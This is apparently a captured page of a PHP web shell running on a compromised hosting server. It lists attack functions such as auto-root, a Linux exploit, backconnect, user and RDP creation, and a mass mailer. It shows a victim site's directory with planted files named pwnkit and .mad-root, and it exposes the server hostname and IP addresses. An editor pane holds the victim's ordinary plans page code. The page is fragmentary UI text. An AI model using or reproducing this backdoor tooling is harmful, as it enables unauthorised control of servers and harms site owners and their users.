Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
chatblueversion /
[ HOME SHELL ]
Name
Size
Permission
Action
760093
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwx---r-x
api
[ DIR ]
drwx---r-x
assets
[ DIR ]
drwx---r-x
auth
[ DIR ]
drwx---r-x
includes
[ DIR ]
drwx---r-x
install
[ DIR ]
drwx---r-x
payment
[ DIR ]
drwx---r-x
storage
[ DIR ]
drwx---r-x
.htaccess
181
B
-rw----r--
.mad-root
0
B
-rw-r--r--
README.txt
1.94
KB
-rw----r--
account.php
3.2
KB
-rw----r--
adminer.php
0
B
-rw-r--r--
config.example.php
475
B
-rw----r--
config.php
1.04
KB
-rw-r--r--
favicon.ico
31.29
KB
-rw----r--
favicon.svg
712
B
-rw----r--
index.php
5
KB
-rw----r--
login.php
1.38
KB
-rw----r--
logout.php
71
B
-rw----r--
plans.php
1.81
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
register.php
2.25
KB
-rw----r--
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : plans.php
<?php require __DIR__.'/includes/bootstrap.php';require_login();$u=current_user();$plans=[['Student',2000,'300 questions'],['Plus',5000,'1,000 questions'],['Researcher',10000,'Advanced research']];?><!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width"><title>Plans · blueversionX</title><link rel="icon" href="favicon.svg"><link rel="stylesheet" href="assets/style.css"></head><body><main data-theme="light" id="app"><aside class="side"><img class="logo" src="assets/blueversionx-logo.svg" alt="blueversionX"><a class="new linkButton" href="index.php"><span>+</span> New chat</a><nav><small>ACCOUNT</small><a class="accountLink" href="account.php"><button>○ <span>Overview</span></button></a><a class="accountLink" href="plans.php"><button>◉ <span>Plans & payments</span></button></a></nav><div class="sideFoot"><a class="accountLink" href="logout.php"><button><i>X</i><span><b><?=htmlspecialchars($u['name']?:$u['email'])?></b><small>Sign out</small></span><em>↗</em></button></a></div></aside><div class="workspace"><header><span>Plans and payments</span><div><button class="iconButton" id="theme">◐</button><a class="adminButton linkButton" href="account.php">Back to account</a></div></header><section class="accountPage"><div class="pageTitle"><span>SUBSCRIPTIONS</span><h1>Choose your plan</h1><p>Pay securely with Mobile Money, Paystack or Flutterwave.</p></div><div class="planGrid"><?php foreach($plans as $p):?><article><small><?=strtoupper($p[0])?></small><h2><?=$p[0]?></h2><strong><?=number_format($p[1])?> CFA <small>/ month</small></strong><p><?=$p[2]?></p><a class="primary linkButton" href="payment/checkout.php?plan=<?=strtolower($p[0])?>">Choose <?=$p[0]?></a></article><?php endforeach?></div></section></div></main><script src="assets/theme.js"></script></body></html>
Close